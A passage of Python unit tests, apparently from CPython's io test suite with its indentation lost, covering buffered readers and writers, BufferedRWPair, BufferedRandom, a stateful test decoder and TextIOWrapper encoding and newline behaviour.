self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getencoding()
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
